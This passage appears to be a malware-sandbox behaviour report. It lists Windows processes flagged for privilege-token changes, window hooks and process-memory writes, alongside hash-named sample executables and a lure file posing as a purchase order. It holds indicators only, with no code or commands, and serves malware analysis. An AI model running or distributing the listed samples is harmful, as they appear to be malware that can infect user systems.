N/A N/A C:\Users\Admin\Downloads\2023-11-23-07\1064606237c6838a948c3ab85b2c95df70c8f85e87958b7e3f9bff9d79e2a645.exe N/A
N/A N/A C:\Windows\SysWOW64\help.exe N/A
N/A N/A C:\Windows\SysWOW64\help.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\cpqflwztt.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\cpqflwztt.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\cpqflwztt.exe N/A
N/A N/A C:\Windows\SysWOW64\help.exe N/A
N/A N/A C:\Windows\SysWOW64\help.exe N/A
N/A N/A C:\Windows\SysWOW64\help.exe N/A
N/A N/A C:\Windows\SysWOW64\help.exe N/A
N/A N/A C:\Windows\SysWOW64\help.exe N/A
N/A N/A C:\Windows\SysWOW64\help.exe N/A
N/A N/A C:\Windows\SysWOW64\help.exe N/A
N/A N/A C:\Windows\SysWOW64\help.exe N/A
N/A N/A C:\Windows\SysWOW64\help.exe N/A
N/A N/A C:\Windows\SysWOW64\help.exe N/A

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeRestorePrivilege N/A C:\Program Files\7-Zip\7zG.exe N/A
Token: 35 N/A C:\Program Files\7-Zip\7zG.exe N/A
Token: SeSecurityPrivilege N/A C:\Program Files\7-Zip\7zG.exe N/A
Token: SeSecurityPrivilege N/A C:\Program Files\7-Zip\7zG.exe N/A
Token: SeRestorePrivilege N/A C:\Program Files\7-Zip\7zG.exe N/A
Token: 35 N/A C:\Program Files\7-Zip\7zG.exe N/A
Token: SeSecurityPrivilege N/A C:\Program Files\7-Zip\7zG.exe N/A
Token: SeSecurityPrivilege N/A C:\Program Files\7-Zip\7zG.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Downloads\2023-11-23-13\496bbeff36c20e17f2967fb96527b48ab329d1cac12347fdbd8692c46dd36786.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Downloads\2023-11-23-13\496bbeff36c20e17f2967fb96527b48ab329d1cac12347fdbd8692c46dd36786.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskmgr.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\system32\taskmgr.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Windows\system32\taskmgr.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\taskmgr.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\taskmgr.exe N/A
Token: 33 N/A C:\Windows\system32\taskmgr.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\system32\taskmgr.exe N/A
Token: SeRestorePrivilege N/A C:\Program Files\7-Zip\7zG.exe N/A
Token: 35 N/A C:\Program Files\7-Zip\7zG.exe N/A
Token: SeSecurityPrivilege N/A C:\Program Files\7-Zip\7zG.exe N/A
Token: SeSecurityPrivilege N/A C:\Program Files\7-Zip\7zG.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Downloads\2023-11-23-12\2dfbf85c26d893e4dae9ca72d6677f00789c7f69ada570b93ccfccc1f37f5225.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Downloads\2023-11-23-12\2e1d8dd0bf1511be6665ac5739ae946357fd033b2e8bbac18ab1b9495c2eebfc.exe N/A
Token: SeRestorePrivilege N/A C:\Program Files\7-Zip\7zG.exe N/A
Token: 35 N/A C:\Program Files\7-Zip\7zG.exe N/A
Token: SeSecurityPrivilege N/A C:\Program Files\7-Zip\7zG.exe N/A
Token: SeSecurityPrivilege N/A C:\Program Files\7-Zip\7zG.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskmgr.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\system32\taskmgr.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Windows\system32\taskmgr.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Downloads\2023-11-23-12\42e0eda5412a988852e1cf9bb963422603d48777e94c5a19f77804213e1f50e6\NEW PO (YST2310-1010).exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Downloads\2023-11-23-12\42e0eda5412a988852e1cf9bb963422603d48777e94c5a19f77804213e1f50e6\NEW PO (YST2310-1010).exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Downloads\2023-11-23-12\9c8162115273ea9afdba3d35d7451f45913ba9764ad626a4cbebc8e9eb734396.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files (x86)\Windows Multimedia Platform\smss.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\taskmgr.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\taskmgr.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Downloads\2023-11-23-12\c83c8ec888f8404ab18d2a3706bafc74a36fb3e05dd64b9c58efd610d67f82cf.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Downloads\2023-11-23-12\c83c8ec888f8404ab18d2a3706bafc74a36fb3e05dd64b9c58efd610d67f82cf.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Downloads\2023-11-23-12\2dfbf85c26d893e4dae9ca72d6677f00789c7f69ada570b93ccfccc1f37f5225.exe N/A
Token: SeRestorePrivilege N/A C:\Program Files\7-Zip\7zG.exe N/A
Token: 35 N/A C:\Program Files\7-Zip\7zG.exe N/A
Token: SeSecurityPrivilege N/A C:\Program Files\7-Zip\7zG.exe N/A
Token: SeSecurityPrivilege N/A C:\Program Files\7-Zip\7zG.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\ghstve.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\yrrpszk.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Downloads\2023-11-23-07\a7a33a377911477afe031d59a486e5ed432da1bd9fabfb9450a5951c7b2edd07.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Downloads\2023-11-23-07\09f3ffc4cf39c48f84b8eac7c29a49f9c1c576fd7c804a18374ee0e93d69bc37.exe N/A
Token: SeRestorePrivilege N/A C:\Program Files\7-Zip\7zG.exe N/A
Token: 35 N/A C:\Program Files\7-Zip\7zG.exe N/A
Token: SeSecurityPrivilege N/A C:\Program Files\7-Zip\7zG.exe N/A
Token: SeSecurityPrivilege N/A C:\Program Files\7-Zip\7zG.exe N/A
Token: SeRestorePrivilege N/A C:\Program Files\7-Zip\7zG.exe N/A
Token: 35 N/A C:\Program Files\7-Zip\7zG.exe N/A
Token: SeSecurityPrivilege N/A C:\Program Files\7-Zip\7zG.exe N/A
Token: SeSecurityPrivilege N/A C:\Program Files\7-Zip\7zG.exe N/A
Token: SeRestorePrivilege N/A C:\Program Files\7-Zip\7zG.exe N/A
Token: 35 N/A C:\Program Files\7-Zip\7zG.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\4731517b198414342891553881913565819509086b8154214462788c740b34c9.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\4731517b198414342891553881913565819509086b8154214462788c740b34c9.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\4731517b198414342891553881913565819509086b8154214462788c740b34c9.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\Downloads\2023-11-23-12\42e0eda5412a988852e1cf9bb963422603d48777e94c5a19f77804213e1f50e6\NEW PO (YST2310-1010).exe N/A
N/A N/A C:\Users\Admin\Downloads\2023-11-23-12\c83c8ec888f8404ab18d2a3706bafc74a36fb3e05dd64b9c58efd610d67f82cf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ghstve.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe N/A
N/A N/A C:\Users\Admin\Downloads\2023-11-23-07\eb4c556151199591ad7d51bd5302b385284c98083711bcb9674225c495aea26a.exe N/A
N/A N/A C:\Users\Admin\Downloads\2023-11-23-07\eb4c556151199591ad7d51bd5302b385284c98083711bcb9674225c495aea26a.exe N/A
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Users\Admin\Downloads\2023-11-23-11\0c5a46d8d282d84fc62077f0d955cdb6f5ba7e63e18d51271669e86b9224301a.exe N/A
N/A N/A C:\Users\Admin\Downloads\2023-11-23-11\0c5a46d8d282d84fc62077f0d955cdb6f5ba7e63e18d51271669e86b9224301a.exe N/A
N/A N/A C:\Users\Admin\Downloads\2023-11-23-11\273a3703b5372321e55b95fd7ef3294ff1e06e6f87efe4deb512074673a2c592.exe N/A
N/A N/A C:\Users\Admin\Downloads\2023-11-23-11\273a3703b5372321e55b95fd7ef3294ff1e06e6f87efe4deb512074673a2c592.exe N/A
N/A N/A C:\Users\Admin\Downloads\2023-11-23-11\c9ed1cac4d4b557f95dc048dc6eb874ab2f2fb9aa85554bc1ba55e2519234c3e.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1124 wrote to memory of 4924 N/A C:\Users\Admin\AppData\Local\Temp\4731517b198414342891553881913565819509086b8154214462788c740b34c9.exe C:\Users\Admin\AppData\Local\Temp\4731517b198414342891553881913565819509086b8154214462788c740b34c9.exe
PID 1124 wrote to memory of 4924 N/A C:\Users\Admin\AppData\Local\Temp\4731517b198414342891553881913565819509086b8154214462788c740b34c9.exe C:\Users\Admin\AppData\Local\Temp\4731517b198414342891553881913565819509086b8154214462788c740b34c9.exe
PID 1124 wrote to memory of 4924 N/A C:\Users\Admin\AppData\Local\Temp\4731517b198414342891553881913565819509086b8154214462788c740b34c9.exe C:\Users\Admin\AppData\Local\Temp\4731517b198414342891553881913565819509086b8154214462788c740b34c9.exe
PID 1196 wrote to memory of 3492 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1196 wrote to memory of 3492 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1196 wrote to memory of 1792 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1196 wrote to memory of 1792 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1196 wrote to memory of 1792 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1196 wrote to memory of 1792 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1196 wrote to memory of 1792 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1196 wrote to memory of 1792 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1196 wrote to memory of 1792 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1196 wrote to memory of 1792 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1196 wrote to memory of 1792 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
